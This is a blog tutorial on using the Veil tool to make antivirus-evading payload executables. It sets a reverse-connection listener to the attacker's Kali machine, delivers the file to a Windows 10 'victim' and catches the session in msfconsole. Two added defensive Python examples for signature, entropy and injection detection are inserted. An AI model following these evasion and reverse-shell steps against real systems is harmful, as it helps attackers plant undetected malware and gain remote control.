Antivirus Bypass with Veil

Avoiding Detection and Going Rogue...

Posted by Dennis on July 3, 2019


Before you continue reading, understand that this tutorial is for educational and demonstration purposes only. I do not condone or support the use of this article as a means to commit any type of crime for malicious purposes. Using this material illegally is punishable under federal law.


What is Veil?

Formerly known as "Veil-Evasion", Veil is a tool written in Python 3.0 that generates antivirus-evading payload executables. With Python 2.0 reaching end of life (EOL) in 2020, Veil-Evasion, Veil's predecessor, is no longer supported because it was written in Python 2. Not to worry though: Veil's payloads and output files are available in multiple programming languages, and two new languages, AutoIt3 and Lua, have been added. You can learn more about the AutoIt scripting language and the Lua programming language on their respective project sites.

From pentesters to hackers, one of the most important issues to address is how to remain undetected within a network or environment and how to evade its security controls. Major companies and businesses all over the world use a wide range of tools and devices, including antivirus software, firewalls, web application firewalls, intrusion detection systems, and many other devices, programs, and applications to protect themselves in the event of an attack. The majority of these products rely on signature-based detection, where a database of known exploit and payload signatures is consulted. The goal here is to create an exploit, or change the signature of a known exploit or payload, so that it no longer matches that database. Veil is the tool we can use to change the signature of a payload to achieve this task. Let's begin.
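To make the signature-matching point concrete, here is an added example (not from the original post or the Veil project): a minimal static scanner that checks a buffer against a placeholder byte signature, and alongside it the Shannon-entropy heuristic scanners use to flag encrypted or packed bodies that an exact signature cannot see. The signature bytes, thresholds and sample buffers are all constructed for this demonstration.

```python
import math
import random

# Constructed placeholder signature: an arbitrary byte pattern standing in for
# a real AV signature of a known stager. It is not taken from any product.
KNOWN_SIGNATURES = {
    "demo-stager-v1": b"\x31\xc0\x50\x68\x63\x61\x6c\x63",
}

def signature_hits(data: bytes) -> list:
    """Return the names of all known byte signatures found in data."""
    return [name for name, sig in KNOWN_SIGNATURES.items() if sig in data]

def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0.0 .. 8.0). Encrypted or packed data sits close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def classify(data: bytes, entropy_threshold: float = 7.0) -> str:
    """Verdict a simple scanner might emit: exact signature first, then entropy."""
    hits = signature_hits(data)
    if hits:
        return "signature:" + ",".join(hits)
    if shannon_entropy(data) >= entropy_threshold:
        return "suspicious:high-entropy"
    return "clean"

# Constructed samples. PLAIN embeds the placeholder signature in low-entropy
# filler; OPAQUE stands in for an encrypted payload body (deterministic
# pseudo-random bytes so the run is reproducible); TEXT is benign content.
PLAIN = b"MZ" + b"\x00" * 200 + KNOWN_SIGNATURES["demo-stager-v1"] + b"\x00" * 200
_rng = random.Random(7)
OPAQUE = b"MZ" + bytes(_rng.getrandbits(8) for _ in range(4096))
TEXT = b"This is an ordinary text file with nothing unusual in it.\n" * 20

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN), ("opaque", OPAQUE), ("text", TEXT)):
        print(f"{label:6} entropy={shannon_entropy(blob):.2f} verdict={classify(blob)}")
```

The plain sample is caught by the exact signature, the opaque one is caught only by its entropy, and the text sample passes both checks.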

1. Veil Installation on Kali Linux

Veil is fairly simple to install and get started with on Kali Linux. You can copy and paste my command syntax from under the next several images if you would like to follow along. If you come across issues at any point, visit the official Veil repository for further installation instructions and the official documentation.

apt-get install veil

Once the installation is complete, run the setup script as highlighted in the image below.

/usr/share/veil/config/setup.sh --force --silent

The installation and initial setup may take several minutes so feel free to grab a coffee while everything is installed and configured. Once completed, you can launch Veil from a terminal by simply typing "veil".

2. Generating a Payload Executable

On Veil's initial main menu, you are given various options depending on your use case. Here I selected "use evasion" and listed the available payloads.

use evasion
list

I selected "use 39", which I will use to create a .exe executable file and send to my Windows 10 machine to test momentarily.

use 39

Below is the payload options screen. I kept the default LPORT and changed the LHOST to my Kali Linux virtual machine's IP address. Note that your IP will be different from mine. Once the victim runs the .exe file, it connects back to LHOST on the listening port, which is how the session is established.

set LHOST <your Kali IP address>

(Images: configuring options, setting LHOST, and verifying the Kali IP address used for LHOST.)

With LHOST set to my Kali IP address, I generated the payload. The default location where the payload is written is highlighted in yellow at the bottom of the image.

Getting the file to open on the victim's machine is where you need to get creative. For demonstration purposes, I used secure copy (scp) via Git on the Windows 10 virtual machine to transfer the file to my desktop.

scp user@ip:/etc/../your-file "C:/Users/XXX/Download"

You can see here that Windows 10 virus and threat protection unfortunately picked up the executable. Let's quickly try another payload!

This time, I decided to generate an encrypted Python payload (use 29) to evade detection. The Python AES Encryption payload stores the shellcode encrypted with the Advanced Encryption Standard (AES), decrypts it at run time, and uses VirtualAlloc injection, which essentially creates an executable area in memory into which the decrypted shellcode is placed.

Here I used MSFVenom to generate my shellcode (option 2) and set up LHOST and LPORT again.

The executable is now ready. I will again transfer the file using secure copy.

Bingo! The executable remained undetected. Note that this is an earlier version of Windows 10 that I keep for research purposes; newer versions of Windows may flag the file as malicious. You can also upload your executable to VirusTotal, a free website that scans a file with many antivirus engines and shows which of them deem it malicious. 34 out of 68 engines detected this file.
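The AES-wrapped payload above beats static scanning, but the VirtualAlloc injection it relies on still shows up at run time. As an added example (not from the original post or Veil), here is a behavioural check over constructed API-trace lines in an assumed "pid api(args) -> ret" format (not any real sandbox's format) that flags a process which allocates PAGE_EXECUTE_READWRITE memory, copies into it, and then starts a thread at that address.

```python
import re
from collections import defaultdict

# Constructed trace: pid 4321 performs the alloc -> copy -> thread sequence,
# pid 8765 only allocates non-executable memory. Addresses are made up.
TRACE = """\
4321 VirtualAlloc(NULL, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) -> 0x1d0000
4321 RtlMoveMemory(0x1d0000, 0x5a3f10, 0x1000) -> 0
4321 CreateThread(NULL, 0, 0x1d0000, NULL, 0, NULL) -> 0x2c4
8765 VirtualAlloc(NULL, 0x2000, MEM_COMMIT, PAGE_READWRITE) -> 0x3e0000
8765 RtlMoveMemory(0x3e0000, 0x7ff010, 0x2000) -> 0
"""

LINE_RE = re.compile(r"^(?P<pid>\d+) (?P<api>\w+)\((?P<args>.*)\) -> (?P<ret>\S+)$")

def parse_trace(text: str):
    """Yield (pid, api, args, ret) for each well-formed trace line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            args = [a.strip() for a in m.group("args").split(",")]
            yield int(m.group("pid")), m.group("api"), args, m.group("ret")

def find_rwx_injections(text: str) -> dict:
    """Map pid -> RWX regions that were allocated, written to, then executed."""
    rwx = defaultdict(set)      # pid -> bases returned by VirtualAlloc with RWX
    written = defaultdict(set)  # pid -> RWX bases that later received a copy
    flagged = defaultdict(list)
    for pid, api, args, ret in parse_trace(text):
        if api == "VirtualAlloc" and "PAGE_EXECUTE_READWRITE" in args:
            rwx[pid].add(ret)
        elif api == "RtlMoveMemory" and args and args[0] in rwx[pid]:
            written[pid].add(args[0])
        elif api == "CreateThread" and len(args) > 2 and args[2] in written[pid]:
            flagged[pid].append(args[2])
    return dict(flagged)

if __name__ == "__main__":
    for pid, regions in find_rwx_injections(TRACE).items():
        print(f"pid {pid}: RWX alloc -> copy -> thread at {', '.join(regions)}")
```

Only the full three-step chain in one process is flagged; an RW allocation or a copy into non-executable memory on its own is not.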

3. Final Thoughts

Being able to generate and deliver this executable to a victim machine enables multiple follow-on attacks. Below you can see that I used msfconsole to accept the connection from the Windows 10 machine when the executable was run. Veil is just one of many tools available for antivirus evasion. I hope you enjoyed this tutorial and were able to get Veil set up without any problems!